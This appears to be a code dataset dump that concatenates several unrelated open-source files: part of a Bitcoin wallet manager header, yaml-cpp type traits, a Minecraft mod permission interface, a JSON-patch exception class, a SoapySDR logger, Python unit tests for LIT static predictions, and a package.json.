   //throws when given a null signer; walletPtr feeds the base class
   ResolverFeed_PythonWalletSingle(
      shared_ptr<AssetWallet_Single> walletPtr,
      PythonSigner* signerptr) :
      ResolvedFeed_AssetWalletSingle(walletPtr),
      signerPtr_(signerptr)
   {
      if (signerPtr_ == nullptr)
         throw WalletException("null signer ptr");
   }
   //maps a pubkey to its asset id, then fetches the private key from the
   //signer; negative ids denote imported keys and are converted first
   const SecureBinaryData& getPrivKeyForPubkey(const BinaryData& pubkey)
   {
      auto pubkeyref = BinaryDataRef(pubkey);
      auto iter = pubkey_to_asset_.find(pubkeyref);
      if (iter == pubkey_to_asset_.end())
         throw runtime_error("invalid value");
      auto id = iter->second->getId();
      if (id >= 0)
         return signerPtr_->getPrivateKeyForIndex(id);
      id = AssetWallet::convertToImportIndex(id);
      return signerPtr_->getPrivateKeyForImportIndex(id);
   }
};
////////////////////////////////////////////////////////////////////////////////
//resolver feed for UniversalSigner: both public data and private keys are
//looked up by hex string through the signer's virtual accessors
class ResolverFeed_Universal : public ResolverFeed
{
private:
   UniversalSigner* signerPtr_ = nullptr;
public:
   //throws when given a null signer
   ResolverFeed_Universal(UniversalSigner* signerptr) :
      signerPtr_(signerptr)
   {
      if (signerPtr_ == nullptr)
         throw WalletException("null signer ptr");
   }
   //fetches the private key for a pubkey (hex-encoded lookup); an empty
   //result is treated as a failed lookup
   const SecureBinaryData& getPrivKeyForPubkey(const BinaryData& pubkey)
   {
      auto&& pubkey_hex = pubkey.toHexStr();
      auto& data = signerPtr_->getPrivDataForKey(pubkey_hex);
      if (data.getSize() == 0)
         throw runtime_error("invalid value");
      return data;
   }
   //generic public-data lookup, also keyed by hex string
   BinaryData getByVal(const BinaryData& val)
   {
      auto&& val_str = val.toHexStr();
      auto data_str = signerPtr_->getPublicDataForKey(val_str);
      if (data_str.size() == 0)
         throw runtime_error("invalid value");
      BinaryData data_bd(data_str);
      return data_bd;
   }
};
////////////////////////////////////////////////////////////////////////////////
//loads every wallet found under path_ and hands out WalletContainer views;
//all public accessors that touch wallets_ take mu_
class WalletManager
{
private:
   //guards wallets_ against concurrent access
   mutable mutex mu_;
   //directory the wallets are loaded from
   const string path_;
   map<string, WalletContainer> wallets_;
   SwigClient::BlockDataViewer bdv_;
private:
   void loadWallets();
   SwigClient::BlockDataViewer& getBDVObj(void);
public:
   //loads wallets from disk eagerly at construction
   WalletManager(const string& path) :
      path_(path)
   {
      loadWallets();
   }
   bool hasWallet(const string& id)
   {
      unique_lock<mutex> lock(mu_);
      auto wltIter = wallets_.find(id);
      return wltIter != wallets_.end();
   }
   //replaces the shared BlockDataViewer handed to wallet containers
   void setBDVObject(const SwigClient::BlockDataViewer& bdv)
   {
      bdv_ = bdv;
   }
   int getLastComputedIndex(const string& id) const;
   void synchronizeWallet(const string& id, unsigned chainLength);
   void duplicateWOWallet(
      const SecureBinaryData& pubRoot,
      const SecureBinaryData& chainCode,
      unsigned chainLength);
   WalletContainer& getCppWallet(const string& id);
   bool setImport(
      string wltID, int importID, const SecureBinaryData& pubkey);
};
#endif
| 8,517 |
// lib/yamlcpp/include/yaml-cpp/traits.h
#ifndef TRAITS_H_62B23520_7C8E_11DE_8A39_0800200C9A66
#define TRAITS_H_62B23520_7C8E_11DE_8A39_0800200C9A66
#if defined(_MSC_VER) || \
(defined(__GNUC__) && (__GNUC__ == 3 && __GNUC_MINOR__ >= 4) || \
(__GNUC__ >= 4)) // GCC supports "pragma once" correctly since 3.4
#pragma once
#endif
#include <type_traits>
#include <utility>
#include <string>
#include <sstream>
namespace YAML {
// Compile-time trait flagging the built-in types treated as numeric.
// The primary template answers false; each supported type is opted in via
// an explicit specialization below. Types without a specialization (e.g.
// bool, signed char) therefore report false.
template <typename>
struct is_numeric {
  enum { value = false };
};
template <>
struct is_numeric<char> {
  enum { value = true };
};
template <>
struct is_numeric<unsigned char> {
  enum { value = true };
};
template <>
struct is_numeric<int> {
  enum { value = true };
};
template <>
struct is_numeric<unsigned int> {
  enum { value = true };
};
template <>
struct is_numeric<long int> {
  enum { value = true };
};
template <>
struct is_numeric<unsigned long int> {
  enum { value = true };
};
template <>
struct is_numeric<short int> {
  enum { value = true };
};
template <>
struct is_numeric<unsigned short int> {
  enum { value = true };
};
// Very old MSVC (< VC++ 7.1) spells 64-bit integers __int64 instead of
// long long; pick the matching pair of specializations.
#if defined(_MSC_VER) && (_MSC_VER < 1310)
template <>
struct is_numeric<__int64> {
  enum { value = true };
};
template <>
struct is_numeric<unsigned __int64> {
  enum { value = true };
};
#else
template <>
struct is_numeric<long long> {
  enum { value = true };
};
template <>
struct is_numeric<unsigned long long> {
  enum { value = true };
};
#endif
template <>
struct is_numeric<float> {
  enum { value = true };
};
template <>
struct is_numeric<double> {
  enum { value = true };
};
template <>
struct is_numeric<long double> {
  enum { value = true };
};
// SFINAE helpers: enable_if_c<true, T> exposes ::type, enable_if_c<false>
// does not, removing the overload from consideration. disable_if is the
// mirror image. Kept local rather than using std::enable_if directly.
template <bool, class T = void>
struct enable_if_c {
  typedef T type;
};
template <class T>
struct enable_if_c<false, T> {};
template <class Cond, class T = void>
struct enable_if : public enable_if_c<Cond::value, T> {};
template <bool, class T = void>
struct disable_if_c {
  typedef T type;
};
template <class T>
struct disable_if_c<true, T> {};
template <class Cond, class T = void>
struct disable_if : public disable_if_c<Cond::value, T> {};
}
// SFINAE probe: is_streamable<S, T>::value is true exactly when the
// expression `declval<S&>() << declval<T>()` is well-formed, i.e. when a
// value of type T can be written to a stream of type S via operator<<.
// NOTE(review): declared at global namespace (outside YAML) — confirm that
// placement is intentional.
template <typename S, typename T>
struct is_streamable {
  // Preferred overload: participates only when the << expression compiles;
  // the comma operator discards its result and yields true_type.
  template <typename StreamT, typename ValueT>
  static auto test(int)
      -> decltype(std::declval<StreamT&>() << std::declval<ValueT>(),
                  std::true_type());

  // Fallback overload, selected when substitution above fails.
  template <typename, typename>
  static auto test(...) -> std::false_type;

  static const bool value = decltype(test<S, T>(0))::value;
};
template<typename Key, bool Streamable>
struct streamable_to_string {
static std::string impl(const Key& key) {
std::stringstream ss;
ss << key;
return ss.str();
}
};
template<typename Key>
struct streamable_to_string<Key, false> {
static std::string impl(const Key&) {
return "";
}
};
#endif // TRAITS_H_62B23520_7C8E_11DE_8A39_0800200C9A66
| 1,119 |
1,403 | package org.dynmap.forge_1_12_2.permissions;
import java.util.Set;
import net.minecraft.command.ICommandSender;
/**
 * Abstraction over the permission backend used to authorize Dynmap commands
 * on Forge 1.12.2. How each query is answered (operator status, a
 * permissions mod, a static file, ...) is up to the implementation and is
 * not visible from this interface.
 */
public interface PermissionProvider {
    /** Returns true if the online {@code sender} may perform the action named by {@code permission}. */
    boolean has(ICommandSender sender, String permission);

    /** Returns true if the online {@code sender} holds the exact permission node {@code permission}. */
    boolean hasPermissionNode(ICommandSender sender, String permission);

    /**
     * Bulk permission check for a possibly-offline player.
     *
     * @return presumably the subset of {@code perms} the player holds —
     *     NOTE(review): inferred from the name and signature only; confirm
     *     against the implementations.
     */
    Set<String> hasOfflinePermissions(String player, Set<String> perms);

    /** Returns true if the possibly-offline {@code player} holds {@code perm}. */
    boolean hasOfflinePermission(String player, String perm);
}
| 136 |
434 | /*
* Copyright 2016 flipkart.com zjsonpatch.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.flipkart.zjsonpatch;
/**
* User: holograph
* Date: 03/08/16
*/
/**
 * Signals that applying a JSON patch operation failed.
 *
 * <p>Carries the {@link Operation} being applied and the {@link JsonPointer}
 * at which the failure occurred, when known; either may be {@code null},
 * and {@link #toString()} omits the corresponding part in that case.
 */
public class JsonPatchApplicationException extends RuntimeException {

    // RuntimeException is Serializable; pin the serial form explicitly.
    private static final long serialVersionUID = 1L;

    /** Patch operation that failed; may be null when unknown. */
    final Operation operation;

    /** Location within the target document; may be null when unknown. */
    final JsonPointer path;

    /**
     * @param message   description of the failure
     * @param operation the operation being applied, or {@code null}
     * @param path      the pointer at which the failure occurred, or {@code null}
     */
    public JsonPatchApplicationException(String message, Operation operation, JsonPointer path) {
        super(message);
        this.operation = operation;
        this.path = path;
    }

    /** @return the failed operation, or {@code null} when unknown */
    public Operation getOperation() {
        return operation;
    }

    /** @return the failure location, or {@code null} when unknown */
    public JsonPointer getPath() {
        return path;
    }

    /**
     * Formats as {@code [<op> Operation] <message> at <path>}, skipping the
     * operation prefix and/or path suffix when they are null; a root pointer
     * is rendered as the literal word "root".
     */
    @Override
    public String toString() {
        StringBuilder sb = new StringBuilder();
        if (operation != null) sb.append('[').append(operation).append(" Operation] ");
        sb.append(getMessage());
        if (path != null) sb.append(" at ").append(path.isRoot() ? "root" : path);
        return sb.toString();
    }
}
| 425 |
749 | <filename>lib/Logger.cpp
// Copyright (c) 2014-2015 <NAME>
// SPDX-License-Identifier: BSL-1.0
#include <SoapySDR/Logger.hpp>
// Thin C++ wrapper over the C logging entry point: forwards the level and
// the message (as a NUL-terminated C string) to SoapySDR_log. Whether the
// message reaches a registered handler or a default sink is decided by the
// C layer, not here.
void SoapySDR::log(const LogLevel logLevel, const std::string &message)
{
    return SoapySDR_log(logLevel, message.c_str());
}
// printf-style logging with an explicit va_list; the caller is responsible
// for va_start/va_end around the call. Forwards directly to the C
// implementation, which consumes the argument list.
void SoapySDR::vlogf(const SoapySDRLogLevel logLevel, const char *format, va_list argList)
{
    return SoapySDR_vlogf(logLevel, format, argList);
}
// Installs `handler` as the log sink by delegating to the C API. The
// handler is passed through unchanged — presumably LogHandler is a typedef
// of the C handler type; confirm in Logger.hpp.
void SoapySDR::registerLogHandler(const LogHandler &handler)
{
    return SoapySDR_registerLogHandler(handler);
}
// Sets the log level via the C API; filtering semantics (which messages
// are kept or dropped) live entirely in SoapySDR_setLogLevel.
void SoapySDR::setLogLevel(const LogLevel logLevel)
{
    SoapySDR_setLogLevel(logLevel);
}
| 237 |
2,854 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Lint as: python3
"""Tests for lit_nlp.lib.model."""
from absl.testing import absltest
from lit_nlp.api import dataset as lit_dataset
from lit_nlp.api import types as lit_types
from lit_nlp.components import static_preds
class StaticPredictionsTest(absltest.TestCase):
  """Unit tests for static_preds.StaticPredictions.

  setUp builds a tiny input dataset mapping number names ("zero".."nine")
  to their indices, plus a parallel canned-predictions dataset of
  "name=val" strings. The tests check that StaticPredictions serves those
  predictions when keyed on the configured identifier fields, and raises
  KeyError for inputs absent from the prediction table.
  """

  def setUp(self):
    super().setUp()
    number_names = [
        "zero", "one", "two", "three", "four", "five", "six", "seven",
        "eight", "nine"
    ]
    # pylint: disable=g-complex-comprehension
    dummy_inputs = [{
        "name": name,
        "val": i
    } for i, name in enumerate(number_names)]
    # pylint: enable=g-complex-comprehension
    input_spec = {"name": lit_types.TextSegment(), "val": lit_types.Scalar()}
    self.input_ds = lit_dataset.Dataset(input_spec, dummy_inputs)
    dummy_preds = [{
        "pred": "{name:s}={val:d}".format(**d)
    } for d in self.input_ds.examples]
    self.preds_ds = lit_dataset.Dataset({"pred": lit_types.TextSegment()},
                                        dummy_preds)

  def _check_predictions(self, model):
    """Shared assertions: whole dataset, a slice, and unknown-input error.

    Both test cases below previously duplicated this entire sequence;
    extracted here so the expectations stay in sync.
    """
    # Whole dataset round-trips to the canned predictions.
    self.assertEqual(
        list(model.predict(self.input_ds.examples)),
        list(self.preds_ds.examples))
    # A slice maps to the corresponding slice of predictions.
    self.assertEqual(
        list(model.predict(self.input_ds.examples[2:5])),
        list(self.preds_ds.examples[2:5]))
    # Unknown examples: should raise KeyError on the second input.
    with self.assertRaises(KeyError):
      inputs = [{"name": "nine", "val": 9}, {"name": "twenty", "val": 20}]
      # Use list() to force the generator to run.
      _ = list(model.predict(inputs))

  def test_all_identifiers(self):
    """Test using all fields as identifier keys."""
    model = static_preds.StaticPredictions(
        self.input_ds, self.preds_ds, input_identifier_keys=["name", "val"])
    self.assertEqual(self.input_ds.spec(), model.input_spec())
    self.assertEqual(self.preds_ds.spec(), model.output_spec())
    self._check_predictions(model)

  def test_partial_identifiers(self):
    """Test using only some fields as identifier keys."""
    model = static_preds.StaticPredictions(
        self.input_ds, self.preds_ds, input_identifier_keys=["name"])
    # Input spec shrinks to just the identifier field.
    self.assertEqual({"name": lit_types.TextSegment()}, model.input_spec())
    self.assertEqual(self.preds_ds.spec(), model.output_spec())
    self._check_predictions(model)
# Allow running this module directly as a test binary.
if __name__ == "__main__":
  absltest.main()
| 1,366 |
4,329 | <gh_stars>1000+
{
"name": "react-server-redux",
"version": "1.0.0-alpha.2",
"description": "Redux support for React-Server",
"main": "target/index.js",
"scripts": {
"build": "gulp build",
"clean": "rimraf target npm-debug.log*",
"lint": "eslint src test",
"test": "ava test/*.spec.js",
"prepublish": "npm run build"
},
"repository": {
"type": "git",
"url": "https://github.com/redfin/react-server"
},
"keywords": [
"react-server",
"redux"
],
"author": "<NAME>",
"license": "Apache-2.0",
"bugs": {
"url": "https://github.com/redfin/react-server/issues"
},
"homepage": "https://github.com/redfin/react-server",
"dependencies": {
"react-redux": "^5.0.1",
"redux": "^3.6.0"
},
"peerDependencies": {
"react": "~0.14.9 || ^15.3.0 || ^16.0.0"
}
}
| 380 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.